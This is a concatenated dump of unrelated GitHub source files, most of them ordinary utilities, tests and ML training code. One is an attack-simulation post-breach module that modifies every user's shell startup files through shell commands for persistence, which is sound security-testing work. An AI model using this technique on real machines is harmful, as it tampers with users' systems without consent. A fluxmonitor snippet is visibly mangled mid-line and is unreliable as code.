\"-\").strip(), format_list[i]\n ).strftime(fmt)\n except Exception:\n break\n if search_res.start() != 0:\n res.left_str = search_text[0 : search_res.start()]\n if search_res.end() + 1 <= len(search_text):\n res.right_str = search_text[search_res.end() :]\n res.match = True\n return res\n\n return res\n\n\ndef replace_date_time(text: str, fmt: str = \"%Y-%m-%d %H:%M:%S\") -> str:\n \"\"\"Replace text all datetime to the right fmt\n\n Parameters\n ----------\n text: str\n ready to search text\n\n fmt: str\n the right datetime format\n\n Returns\n -------\n str\n The right format datetime str\n\n \"\"\"\n\n if not text:\n return text\n res_str = \"\"\n res = get_date_time(text, fmt)\n if not res.match:\n return text\n if res.left_str:\n res_str += replace_date_time(res.left_str)\n res_str += res.value\n if res.right_str:\n res_str += replace_date_time(res.right_str)\n\n return res_str\n\n\n_BYTE_UNIT = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n\n\ndef get_byte_from_str(byte_str: str) -> Optional[int]:\n \"\"\"Get byte from str\n\n Parameters\n ----------\n byte_str: str\n Include byte str\n\n Returns\n -------\n int\n Byte\n \"\"\"\n search_res = re.match(r\"(\\d{1,})(B|KB|MB|GB|TB)\", byte_str)\n if search_res:\n unit_str = search_res.group(2)\n unit: int = 1\n for it in _BYTE_UNIT:\n if it == unit_str:\n break\n unit *= 1024\n\n return int(search_res.group(1)) * unit\n\n return None\n\n\ndef truncate_filename(path: str, limit: int = 230) -> str:\n \"\"\"Truncate filename to the max len.\n\n Parameters\n ----------\n path: str\n File name path\n\n limit: int\n limit file name len(utf-8 byte)\n\n Returns\n -------\n str\n if file name len more than limit then return truncate filename or return filename\n\n \"\"\"\n p, f = os.path.split(os.path.normpath(path))\n f, e = os.path.splitext(f)\n f_max = limit - len(e.encode(\"utf-8\"))\n f = unicodedata.normalize(\"NFC\", f)\n f_trunc = f.encode()[:f_max].decode(\"utf-8\", errors=\"ignore\")\n return os.path.join(p, f_trunc + e)\n\n\ndef extract_info_from_link(link: str):\n \"\"\"Extract info from link\"\"\"\n if link in (\"me\", \"self\"):\n return link, None\n\n channel_match = re.match(r\"(?:https?://)?t\\.me/c/(\\w+)(?:.*/(\\d+)|/(\\d+))?\", link)\n if channel_match:\n chat_id = f\"-100{channel_match.group(1)}\"\n message_id = int(channel_match.group(2)) if channel_match.group(2) else None\n return int(chat_id), message_id\n\n username_match = re.match(r\"(?:https?://)?t\\.me/(\\w+)(?:.*/(\\d+)|/(\\d+))?\", link)\n if username_match:\n username = username_match.group(1)\n message_id = int(username_match.group(2)) if username_match.group(2) else None\n return username, message_id\n\n return None, None\n\n\ndef validate_title(title: str) -> str:\n \"\"\"Fix if title validation fails\n\n Parameters\n ----------\n title: str\n Chat title\n\n \"\"\"\n\n r_str = r\"[/\\\\:*?\\\"<>|\\n]\" # '/ \\ : * ? \" < > |'\n new_title = re.sub(r_str, \"_\", title)\n return new_title\n\n\ndef create_progress_bar(progress, total_bars=10):\n \"\"\"\n example\n progress = 50\n progress_bar = create_progress_bar(progress)\n print(f'Progress: [{progress_bar}] ({progress}%)')\n \"\"\"\n completed_bars = int(progress * total_bars / 100)\n remaining_bars = total_bars - completed_bars\n progress_bar = \"█\" * completed_bars + \"░\" * remaining_bars\n return progress_bar\n","repo_name":"tangyoha/telegram_media_downloader","sub_path":"utils/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"53"} +{"seq_id":"69948336810","text":"from functools import lru_cache, reduce\nfrom logging import getLogger\n\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom agenda_maker.common.release_gpu_memory import release_gpu_memory\nfrom agenda_maker.model.base_model import BaseModel\n\nlogger = getLogger(__name__)\n\n__all__ = [\"SemanticTextSegmentation\"]\n\n\nclass SemanticTextSegmentation(BaseModel):\n\n \"\"\"\n SentenceTransformerでベクトル化してcosine similarityを算出し\n 類似度が閾値以上で文章を結合する。\n \"\"\"\n\n def set_params(self) -> None:\n # parameter of semantic segmentation\n self.threshold = self.config_manager.config.model.segmentation.semantic_segmentation.threshold\n self.th_segment_num = self.config_manager.config.model.segmentation.th_segment_num\n self.max_segment_text = self.config_manager.config.model.segmentation.max_segment_text\n self.min_segment_text = self.config_manager.config.model.segmentation.min_segment_text\n self.model_type = self.config_manager.config.model.segmentation.semantic_segmentation.model_type\n\n def build_model(self) -> None:\n self.set_params()\n self.load_sentence_transformer()\n\n def get_result(self, list_text: list[str]) -> list:\n self.build_model()\n semantic_segmentation = self._semantic_segmentation(list_text, threshold=self.threshold)\n semantic_segmentation = self.semantic_segmentation(list_text)\n if len(list_text) >= self.th_segment_num:\n semantic_segmentation = self.merge_min_text(semantic_segmentation)\n release_gpu_memory(gpu_task=self.model)\n return semantic_segmentation\n\n @lru_cache\n def load_sentence_transformer(self) -> None:\n self.model = SentenceTransformer(self.model_type)\n\n def semantic_segmentation(self, list_text: list[str]) -> list[str]:\n th_max = self.max_segment_text\n th_sim = self.threshold\n\n list_result = self._get_sim_len(list_text)\n\n while True:\n if len(list_text) <= self.th_segment_num:\n break\n is_continue = any([(value[0] >= th_sim and value[1] <= th_max) for value in list_result])\n\n if is_continue:\n list_text = self.combine_similar_strings(\n list_text=list_text, list_result=list_result, th_sim=th_sim, th_max=th_max\n )\n list_result = self._get_sim_len(list_text)\n else:\n break\n return list_text\n\n def merge_min_text(self, list_text: list[list[str]]) -> list[str]:\n \"\"\"\n 文字列のリストを指定された条件に従って結合します。\n\n Args:\n list_text (list): 結合する文字列が格納されたリスト。\n th_min (int): チャンクとして結合するための最小文字数。\n th_max (int): チャンクとして結合後の最大文字数。\n\n Returns:\n list: 結合されたチャンクを格納したリスト。\n\n \"\"\"\n th_max = self.max_segment_text\n th_min = self.min_segment_text\n merged_text = []\n current_chunk = \"\"\n\n for i in range(len(list_text)):\n text = list_text[i]\n\n if len(current_chunk) + len(text) <= th_max:\n current_chunk += text\n else:\n if len(current_chunk) >= th_min:\n merged_text.append(current_chunk)\n current_chunk = text\n\n if len(current_chunk) >= th_min:\n merged_text.append(current_chunk)\n\n return merged_text\n\n def _get_sim_len(self, list_text: list[str]) -> list[list[float, float]]:\n list_result = []\n for i_text in range(len(list_text) - 1):\n list_result.append(\n [\n self._get_similarity(list_text[i_text], list_text[i_text + 1])[0][0],\n len(list_text[i_text]) + len(list_text[i_text + 1]),\n ]\n )\n return list_result\n\n def combine_similar_strings(self, list_text: list[str], list_result: list[list[float, float]], th_sim, th_max):\n \"\"\"\n 指定された条件を満たすように文字列リストを結合します。\n\n Args:\n list_text (list of str): 結合対象の文字列が含まれたリスト。\n list_result (list of list): 類似度と文字数の情報を含むリスト。\n 各要素は [similarity, sum_len] の形式で、list_text の隣接要素間の比較結果を示します。\n th_sim (float): 類似度の閾値。この閾値以上の類似度の場合、文字列を結合します。\n th_max (int): 文字数の最大制限。結合後の文字列の文字数がこの制限を超えないようにします。\n\n Returns:\n list of str: 条件を満たすように結合された文字列のリスト。リストの順番は変更されません。\n\n Example:\n list_text = [\n '文書1のテキスト',\n '文書2のテキスト',\n # ... 他の文書のテキスト ...\n ]\n list_result = [\n [0.8, 300], # 文書1と文書2の類似度と文字数\n [0.6, 250], # 文書2と文書3の類似度と文字数\n # ... 他の比較結果 ...\n ]\n th_sim = 0.7\n th_max = 500\n\n combined_text = combine_similar_strings(list_text, list_result, th_sim, th_max)\n\n \"\"\"\n combined_text = []\n current_text = list_text[0]\n\n for i in range(len(list_text) - 1):\n similarity, sum_len = list_result[i]\n next_text = list_text[i + 1]\n\n if similarity >= th_sim and sum_len <= th_max:\n current_text += next_text\n else:\n combined_text.append(current_text)\n current_text = next_text\n\n combined_text.append(current_text)\n return combined_text\n\n def _get_similarity(self, text1: str, text2: str) -> float:\n \"\"\"テキスト1とテキスト2の文書ベクトルのコサイン類似度を計算\"\"\"\n embeding_1 = self.model.encode(text1).reshape(1, -1)\n embeding_2 = self.model.encode(text2).reshape(1, -1)\n\n if np.any(np.isnan(embeding_1)) or np.any(np.isnan(embeding_2)):\n return 0\n\n sim = cosine_similarity(embeding_1, embeding_2)\n return sim\n\n def _semantic_segmentation(self, segments: list[str], threshold: float) -> list:\n new_segments = []\n is_over = True\n\n while is_over:\n dict_result = self._semantic_segmentation_core(segments=segments, threshold=threshold)\n list_index = dict_result[\"list_index\"]\n list_sim = dict_result[\"list_sim\"]\n for index_i in list_index:\n seg = \" \".join([segments[i] for i in index_i])\n new_segments.append(seg)\n if len(seg) > self.max_segment_text:\n if threshold > 1.0:\n is_over = False\n else:\n is_over = True\n new_segments = []\n break\n else:\n is_over = False\n threshold += 0.01\n\n return new_segments\n\n def _index_mapping(self, segment_map) -> list[int]:\n \"\"\"分割された文のインデックスをリストでまとめる\"\"\"\n index_list = []\n temp = []\n for index, i in enumerate(segment_map):\n if i == 1:\n index_list.append(temp)\n temp = [index]\n else:\n temp.append(index)\n index_list.append(temp)\n return index_list\n\n def _semantic_segmentation_core(self, segments: list[str], threshold: float) -> dict:\n segment_map = [0]\n list_sim = [0.0]\n for index, (text1, text2) in enumerate(zip(segments[:-1], segments[1:])):\n sim = self._get_similarity(text1, text2)\n list_sim.append(sim[0][0])\n if sim >= threshold:\n segment_map.append(0)\n else:\n segment_map.append(1)\n list_index = self._index_mapping(segment_map)\n return {\"list_index\": list_index, \"list_sim\": list_sim}\n","repo_name":"jumtra/agenda_maker","sub_path":"agenda_maker/model/segmentation/semantic_segmentation.py","file_name":"semantic_segmentation.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71046123689","text":"from random import randint #gera um valor aleatorio entre o numero que esta entre ()\n\nnumero_informado = -1 #ele colocou o menos -1 pq esta fora possibilidade entre 0 a 9\nnumero_secreto = randint(0, 9)\n\nwhile numero_informado != numero_secreto: #enquanto o numero informado for diferente do numero secreto, vai continuar tentando, no caso o usuario\n numero_informado = int(input('Informe o numero: '))\n\nprint('Numero secreto {} foi encontrado!'.format(numero_secreto))\n\n\n#aq é um laço indefinido, ou seja bem aleatorio, porem se tentar ficar executando o mesmo numero não vai dar\n#usado em casos especificos \n#https://www.youtube.com/watch?v=9Xzrzmq3eDg","repo_name":"kamibarreto/Cod3r","sub_path":"Estrutura_Controle/while_1.py","file_name":"while_1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328599528","text":"from tests.trainer.generic import std_trainer_input_2\n\nfrom knodle.trainer.wscrossweigh.wscrossweigh_weights_calculator import WSCrossWeighWeightsCalculator\n\n\ndef test_dscw_base_test(std_trainer_input_2):\n (\n model,\n inputs_x, mapping_rules_labels_t, train_rule_matches_z,\n test_dataset, test_labels\n ) = std_trainer_input_2\n\n trainer = WSCrossWeighWeightsCalculator(\n model=model,\n mapping_rules_labels_t=mapping_rules_labels_t,\n model_input_x=inputs_x,\n rule_matches_z=train_rule_matches_z\n )\n\n trainer.train()\n clf_report, _ = trainer.test(test_dataset, test_labels)\n\n # Check that this runs without error\n assert True\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/wscrossweigh/test_wscw.py","file_name":"test_wscw.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"11975539687","text":"import unittest\r\nfrom swml import SignalWireML, SipRefer\r\n\r\nclass TestSipRefer(unittest.TestCase):\r\n def setUp(self):\r\n self.response = SignalWireML()\r\n\r\n def test_sip_refer_with_instance(self):\r\n main_section = self.response.add_section('main')\r\n # Create a SipRefer instance with a more complex result parameter\r\n sip_refer_instance = SipRefer(\"sip:alice@example.com\", {\"when\": \"vars.return_value != 'success'\",\r\n \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}})\r\n main_section.add_instruction(sip_refer_instance)\r\n\r\n expected_swml = '{\"sections\": {\"main\": [{\"sip_refer\": {\"to_uri\": \"sip:alice@example.com\", \"result\": {\"when\": \"vars.return_value != \\'success\\'\", \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}}}}]}}'\r\n self.assertEqual(self.response.generate_swml(), expected_swml)\r\n\r\n def test_sip_refer_with_method(self):\r\n main_section = self.response.add_section('main')\r\n # Call the sip_refer method with a more complex result parameter\r\n main_section.sip_refer(to_uri=\"sip:alice@example.com\",\r\n result={\"when\": \"vars.return_value != 'success'\",\r\n \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}})\r\n\r\n expected_swml = '{\"sections\": {\"main\": [{\"sip_refer\": {\"to_uri\": \"sip:alice@example.com\", \"result\": {\"when\": \"vars.return_value != \\'success\\'\", \"then\": {\"goto\": {\"label\": \"refer\", \"max\": 2}}}}}]}}'\r\n self.assertEqual(self.response.generate_swml(), expected_swml)","repo_name":"signalwire-community/swml-python","sub_path":"tests/test_swml_sip_refer.py","file_name":"test_swml_sip_refer.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26492894094","text":"import subprocess\nfrom typing import Dict\n\nfrom common.common_consts.post_breach_consts import POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION\nfrom common.common_consts.timeouts import LONG_REQUEST_TIMEOUT\nfrom infection_monkey.i_puppet.i_puppet import PostBreachData\nfrom infection_monkey.post_breach.pba import PBA\nfrom infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import (\n get_commands_to_modify_shell_startup_files,\n)\nfrom infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger\n\n\nclass ModifyShellStartupFiles(PBA):\n \"\"\"\n This PBA attempts to modify shell startup files,\n like ~/.profile, ~/.bashrc, ~/.bash_profile in linux,\n and profile.ps1 in windows.\n \"\"\"\n\n def __init__(self, telemetry_messenger: ITelemetryMessenger):\n super().__init__(telemetry_messenger, name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION)\n\n def run(self, options: Dict):\n results = [pba.run(options) for pba in self.modify_shell_startup_PBA_list()]\n if not results:\n results = [\n (\n \"Modify shell startup files PBA failed: Unable to find any regular users\",\n False,\n )\n ]\n # `command` is empty here since multiple commands were run through objects of the nested\n # class. The results of each of those were aggregated to send the telemetry just once.\n self.pba_data.append(PostBreachData(self.name, self.command, results))\n return self.pba_data\n\n @classmethod\n def modify_shell_startup_PBA_list(cls):\n return cls.ShellStartupPBAGenerator.get_modify_shell_startup_pbas()\n\n class ShellStartupPBAGenerator:\n @classmethod\n def get_modify_shell_startup_pbas(cls):\n (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux), (\n cmds_for_windows,\n shell_startup_files_per_user_for_windows,\n ) = get_commands_to_modify_shell_startup_files()\n\n pbas = []\n\n for startup_file_per_user in shell_startup_files_per_user_for_windows:\n windows_cmds = \" \".join(cmds_for_windows).format(startup_file_per_user)\n pbas.append(cls.ModifyShellStartupFile(linux_cmds=\"\", windows_cmds=windows_cmds))\n\n for username in usernames_for_linux:\n for shell_startup_file in shell_startup_files_for_linux:\n linux_cmds = (\n \" \".join(cmds_for_linux).format(shell_startup_file).format(username)\n )\n pbas.append(cls.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds=\"\"))\n\n return pbas\n\n class ModifyShellStartupFile(PBA):\n def __init__(self, linux_cmds, windows_cmds):\n super().__init__(\n telemetry_messenger=None,\n name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,\n linux_cmd=linux_cmds,\n windows_cmd=windows_cmds,\n )\n\n def run(self, options):\n if self.command:\n try:\n output = subprocess.check_output( # noqa: DUO116\n self.command,\n stderr=subprocess.STDOUT,\n shell=True,\n timeout=LONG_REQUEST_TIMEOUT,\n ).decode()\n\n return output, True\n except subprocess.CalledProcessError as err:\n # Return error output of the command\n return str(err), False\n except subprocess.TimeoutExpired as err:\n return str(err), False\n","repo_name":"acorbil2022/infectionMonkey","sub_path":"monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py","file_name":"modify_shell_startup_files.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18105065109","text":"\n# WIP\nimport csv\nimport random\nfrom faker import Faker\nimport faker.providers\nfrom faker.providers import address, automotive, bank, barcode, color, company, credit_card, currency, date_time, emoji, file, geo, internet, isbn, job, lorem, misc, person, phone_number, profile, python, sbn, ssn, user_agent\n\n\n\n# 24 standard providers\nstandard_providers = [\n address.Provider,\n automotive.Provider,\n bank.Provider,\n barcode.Provider,\n color.Provider,\n company.Provider,\n credit_card.Provider,\n currency.Provider,\n date_time.Provider,\n emoji.Provider,\n file.Provider,\n geo.Provider,\n internet.Provider,\n isbn.Provider,\n job.Provider,\n lorem.Provider,\n misc.Provider,\n person.Provider,\n phone_number.Provider,\n profile.Provider,\n python.Provider,\n sbn.Provider,\n ssn.Provider,\n user_agent.Provider ]\n \n\n\nfake = Faker()\n\n# pii_to_faker = {}\n\n# for provider in standard_providers:\n# # Instantiate the provider\n# provider_instance = provider(fake)\n\n# # Loop over all methods of the provider\n# for method_name in dir(provider_instance):\n# # Ignore special methods (those that start with '__')\n# if not method_name.startswith('__'):\n# method = getattr(provider_instance, method_name)\n\n# # Check if the method is callable\n# if callable(method):\n# # Add the method to pii_to_faker\n# pii_to_faker[method_name] = method\n\npii_to_faker = {\n# \"animal_image\": fake.animal_image(),\n\"ascii_company_email\": fake.ascii_company_email(),\n\"ascii_email\": fake.ascii_email(),\n\"ascii_free_email\": fake.ascii_free_email(),\n\"ascii_safe_email\": fake.ascii_safe_email(),\n\"boolean\": fake.boolean(),\n\"building_number\": fake.building_number(),\n# \"building_string\": fake.building_string(),\n\"city\": fake.city(),\n# \"city_name\": fake.city_name(),\n\"city_prefix\": fake.city_prefix(),\n\"city_suffix\": fake.city_suffix(),\n\"color\": fake.color(),\n\"company\": fake.company(),\n\"company_email\": fake.company_email(),\n\"coordinate\": fake.coordinate(),\n\"country\": fake.country(),\n\"country_calling_code\": fake.country_calling_code(),\n\"credit_card_expire\": fake.credit_card_expire(),\n\"credit_card_full\": fake.credit_card_full(),\n\"credit_card_number\": fake.credit_card_number(),\n\"credit_card_provider\": fake.credit_card_provider(),\n\"credit_card_security_code\": fake.credit_card_security_code(),\n\"currency\": fake.currency(),\n\"currency_code\": fake.currency_code(),\n\"date\": fake.date(),\n\"date_between\": fake.date_between(),\n\"date_between_dates\": fake.date_between_dates(),\n\"date_object\": fake.date_object(),\n\"date_of_birth\": fake.date_of_birth(),\n\"day_of_month\": fake.day_of_month(),\n\"day_of_week\": fake.day_of_week(),\n\"domain_name\": fake.domain_name(),\n\"domain_word\": fake.domain_word(),\n\"dsv\": fake.dsv(),\n\"ean\": fake.ean(),\n\"email\": fake.email(),\n\"file_extension\": fake.file_extension(),\n\"file_name\": fake.file_name(),\n\"file_path\": fake.file_path(),\n\"first_name\": fake.first_name(),\n\"first_name_female\": fake.first_name_female(),\n\"first_name_male\": fake.first_name_male(),\n\"first_name_nonbinary\": fake.first_name_nonbinary(),\n\"fixed_width\": fake.fixed_width(),\n# \"format\": fake.format(),\n\"free_email\": fake.free_email(),\n\"free_email_domain\": fake.free_email_domain(),\n# \"geo_coordinate\": fake.geo_coordinate(),\n\"hex_color\": fake.hex_color(),\n\"image_url\": fake.image_url(),\n\"internet_explorer\": fake.internet_explorer(),\n\"ipv4\": fake.ipv4(),\n\"ipv4_network_class\": fake.ipv4_network_class(),\n\"ipv4_private\": fake.ipv4_private(),\n\"ipv4_public\": fake.ipv4_public(),\n\"ipv6\": fake.ipv6(),\n\"isbn10\": fake.isbn10(),\n\"isbn13\": fake.isbn13(),\n\"job\": fake.job(),\n\"language_code\": fake.language_code(),\n\"language_name\": fake.language_name(),\n\"last_name\": fake.last_name(),\n\"last_name_female\": fake.last_name_female(),\n\"last_name_male\": fake.last_name_male(),\n\"last_name_nonbinary\": fake.last_name_nonbinary(),\n\"latitude\": fake.latitude(),\n\"latlng\": fake.latlng(),\n\"license_plate\": fake.license_plate(),\n\"linux_platform_token\": fake.linux_platform_token(),\n\"linux_processor\": fake.linux_processor(),\n\"locale\": fake.locale(),\n\"longitude\": fake.longitude(),\n\"mac_address\": fake.mac_address(),\n\"mac_platform_token\": fake.mac_platform_token(),\n\"mac_processor\": fake.mac_processor(),\n\"md5\": fake.md5(),\n\"msisdn\": fake.msisdn(),\n\"name\": fake.name(),\n\"name_female\": fake.name_female(),\n\"name_male\": fake.name_male(),\n\"name_nonbinary\": fake.name_nonbinary(),\n\"nic_handle\": fake.nic_handle(),\n\"nic_handles\": fake.nic_handles(),\n\"null_boolean\": fake.null_boolean(),\n\"opera\": fake.opera(),\n\"paragraph\": fake.paragraph(),\n\"paragraphs\": fake.paragraphs(),\n\"password\": fake.password(),\n\"phone_number\": fake.phone_number(),\n\"postalcode\": fake.postalcode(),\n\"prefix\": fake.prefix(),\n\"prefix_female\": fake.prefix_female(),\n\"prefix_male\": fake.prefix_male(),\n\"prefix_nonbinary\": fake.prefix_nonbinary(),\n\"profile\": fake.profile(),\n\"pybool\": fake.pybool(),\n\"pydecimal\": fake.pydecimal(),\n\"pydict\": fake.pydict(),\n\"pyfloat\": fake.pyfloat(),\n\"pyint\": fake.pyint(),\n\"pyiterable\": fake.pyiterable(),\n\"pylist\": fake.pylist(),\n\"pyobject\": fake.pyobject(),\n\"pyset\": fake.pyset(),\n\"pystr\": fake.pystr(),\n\"pystr_format\": fake.pystr_format(),\n\"pystruct\": fake.pystruct(),\n\"pytuple\": fake.pytuple(),\n# \"random\": fake.random(),\n\"random_digit\": fake.random_digit(),\n\"random_digit_not_null\": fake.random_digit_not_null(),\n\"random_digit_or_empty\": fake.random_digit_or_empty(),\n\"random_element\": fake.random_element(),\n\"random_int\": fake.random_int(),\n\"random_letter\": fake.random_letter(),\n\"random_number\": fake.random_number(),\n\"random_sample\": fake.random_sample(),\n\"randomize_nb_elements\": fake.randomize_nb_elements(),\n# \"rgba_color\": fake.rgba_color(),\n\"safe_color_name\": fake.safe_color_name(),\n\"safe_domain_name\": fake.safe_domain_name(),\n\"safe_email\": fake.safe_email(),\n\"safari\": fake.safari(),\n\"sentence\": fake.sentence(),\n\"sentences\": fake.sentences(),\n\"sha1\": fake.sha1(),\n\"sha256\": fake.sha256(),\n\"slug\": fake.slug(),\n\"ssn\": fake.ssn(),\n\"street_address\": fake.street_address(),\n\"street_name\": fake.street_name(),\n\"street_suffix\": fake.street_suffix(),\n\"suffix\": fake.suffix(),\n\"suffix_female\": fake.suffix_female(),\n\"suffix_male\": fake.suffix_male(),\n\"suffix_nonbinary\": fake.suffix_nonbinary(),\n\"tar\": fake.tar(),\n\"text\": fake.text(),\n\"texts\": fake.texts(),\n\"time\": fake.time(),\n\"time_delta\": fake.time_delta(),\n\"time_object\": fake.time_object(),\n\"timezone\": fake.timezone(),\n\"tld\": fake.tld(),\n\"tsv\": fake.tsv(),\n\"unix_device\": fake.unix_device(),\n\"unix_partition\": fake.unix_partition(),\n\"uri\": fake.uri(),\n\"uri_extension\": fake.uri_extension(),\n\"uri_page\": fake.uri_page(),\n\"uri_path\": fake.uri_path(),\n\"url\": fake.url(),\n\"user_agent\": fake.user_agent(),\n\"uuid4\": fake.uuid4(),\n\"windows_platform_token\": fake.windows_platform_token(),\n\"word\": fake.word(),\n\"words\": fake.words(),\n\"zip\": fake.zip()\n}\n\n# generate a dataset of 1000 rows for \n\n\n\n# Save the synthetic dataset to a CSV file\nwith open('synthetic_dataset.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerows(dataset)\n","repo_name":"CodexifyAI/codexify","sub_path":"training/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26503516837","text":"\nimport unittest\nimport socket\nimport struct\n\nfrom fluxmonitor.player._device_fsm import PyDeviceFSM\nfrom tests.fixtures import Fixtures\n\nG1F6000X41Y29Z116T0E5 = struct.pack(\" 0:\n pass\n\n self.assertEqual(self.callback_queue[0][1], \"G28\")\n self.assertEqual(self.callback_queue[-1][1], \"G28\")\n","repo_name":"flux3dp/delta-firmware","sub_path":"tests/player/test_fsm.py","file_name":"test_fsm.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74177632808","text":"# -*- coding: utf-8 -*-\nimport os\nimport multiprocessing\nfrom glob import glob\nimport moxing as mox # 华为自研模块moxing,本地机器无法安装,仅可在华为云ModelArts平台上使用,\n# moxing文档请查看 https://github.com/huaweicloud/ModelArts-Lab/tree/master/docs/moxing_api_doc\nimport numpy as np\nfrom keras import backend\nfrom keras.models import Model\nfrom keras.optimizers import adam\nfrom keras.layers import Flatten, Dense, Dropout\nfrom keras.callbacks import TensorBoard, Callback, EarlyStopping\nfrom keras import regularizers\n\nfrom data_gen import data_flow\nfrom models.resnet50 import ResNet50\n\nbackend.set_image_data_format('channels_last')\n\n\ndef model_fn(FLAGS, objective, optimizer, metrics):\n \"\"\"\n pre-trained resnet50 model\n \"\"\"\n base_model = ResNet50(weights=\"imagenet\",\n include_top=False,\n pooling=None,\n input_shape=(FLAGS.input_size, FLAGS.input_size, 3),\n classes=FLAGS.num_classes)\n for layer in base_model.layers:\n layer.trainable = False\n x = base_model.output\n x = Flatten()(x)\n x = Dense(256, activation='sigmoid', kernel_regularizer=regularizers.l1(0.0001))(x)\n x = Dropout(rate=0.3)(x)\n predictions = Dense(FLAGS.num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n model.compile(loss=objective, optimizer=optimizer, metrics=metrics)\n return model\n\n\nclass LossHistory(Callback):\n def __init__(self, FLAGS):\n super(LossHistory, self).__init__()\n self.FLAGS = FLAGS\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.FLAGS.snapshot_freq == 0:\n save_path = os.path.join(self.FLAGS.train_local, 'weights_%03d_%.4f.h5' % (epoch, logs.get('val_acc')))\n self.model.save_weights(save_path)\n if self.FLAGS.train_url.startswith('s3://'):\n save_url = os.path.join(self.FLAGS.train_url, 'weights_%03d_%.4f.h5' % (epoch, logs.get('val_acc')))\n mox.file.copy(save_path, save_url)\n print('save weights file', save_path)\n\n if self.FLAGS.keep_weights_file_num > -1:\n weights_files = glob(os.path.join(self.FLAGS.train_local, '*.h5'))\n if len(weights_files) >= self.FLAGS.keep_weights_file_num:\n weights_files.sort(key=lambda file_name: os.stat(file_name).st_ctime, reverse=True)\n for file_path in weights_files[self.FLAGS.keep_weights_file_num:]:\n os.remove(file_path) # only remove weights files on local path\n\n\ndef train_model(FLAGS):\n # data flow generator\n train_sequence, validation_sequence = data_flow(FLAGS.data_local, FLAGS.batch_size,\n FLAGS.num_classes, FLAGS.input_size)\n\n optimizer = adam(lr=FLAGS.learning_rate, decay=1e-6,clipnorm=0.001)\n objective = 'categorical_crossentropy'\n metrics = ['accuracy']\n model = model_fn(FLAGS, objective, optimizer, metrics)\n if FLAGS.restore_model_path != '' and mox.file.exists(FLAGS.restore_model_path):\n if FLAGS.restore_model_path.startswith('s3://'):\n restore_model_name = FLAGS.restore_model_path.rsplit('/', 1)[1]\n mox.file.copy(FLAGS.restore_model_path, '/cache/tmp/' + restore_model_name)\n model.load_weights('/cache/tmp/' + restore_model_name)\n os.remove('/cache/tmp/' + restore_model_name)\n else:\n model.load_weights(FLAGS.restore_model_path)\n print('restore parameters from %s success' % FLAGS.restore_model_path)\n\n if not os.path.exists(FLAGS.train_local):\n os.makedirs(FLAGS.train_local)\n tensorboard = TensorBoard(log_dir=FLAGS.train_local, batch_size=FLAGS.batch_size)\n early_stopping = EarlyStopping(monitor='val_loss', patience=4, verbose=2)\n history = LossHistory(FLAGS)\n model.fit_generator(\n train_sequence,\n steps_per_epoch=len(train_sequence),\n epochs=FLAGS.max_epochs,\n verbose=1,\n callbacks=[history, tensorboard, early_stopping],\n validation_data=validation_sequence,\n max_queue_size=10,\n workers=int(multiprocessing.cpu_count() * 0.7),\n use_multiprocessing=True,\n shuffle=True\n )\n\n print('training done!')\n\n # 将训练日志拷贝到OBS,然后可以用 ModelArts 训练作业自带的tensorboard查看训练情况\n if FLAGS.train_url.startswith('s3://'):\n files = mox.file.list_directory(FLAGS.train_local)\n for file_name in files:\n if file_name.startswith('enevts'):\n mox.file.copy(os.path.join(FLAGS.train_local, file_name), os.path.join(FLAGS.train_url, file_name))\n print('save events log file to OBS path: ', FLAGS.train_url)\n\n pb_save_dir_local = ''\n if FLAGS.deploy_script_path != '':\n from save_model import save_pb_model\n # 默认将最新的模型保存为pb模型,您可以使用python run.py --mode=save_pb ... 将指定的h5模型转为pb模型\n pb_save_dir_local = save_pb_model(FLAGS, model)\n\n if FLAGS.deploy_script_path != '' and FLAGS.test_data_url != '':\n print('test dataset predicting...')\n from inference import infer_on_dataset\n accuracy, result_file_path = infer_on_dataset(FLAGS.test_data_local, FLAGS.test_data_local, os.path.join(pb_save_dir_local, 'model'))\n if accuracy is not None:\n metric_file_name = os.path.join(FLAGS.train_url, 'metric.json')\n metric_file_content = '{\"total_metric\": {\"total_metric_values\": {\"accuracy\": %0.4f}}}' % accuracy\n with mox.file.File(metric_file_name, \"w\") as f:\n f.write(metric_file_content + '\\n')\n if FLAGS.train_url.startswith('s3://'):\n result_file_path_obs = os.path.join(FLAGS.train_url, 'model', os.path.basename(result_file_path))\n mox.file.copy(result_file_path, result_file_path_obs)\n 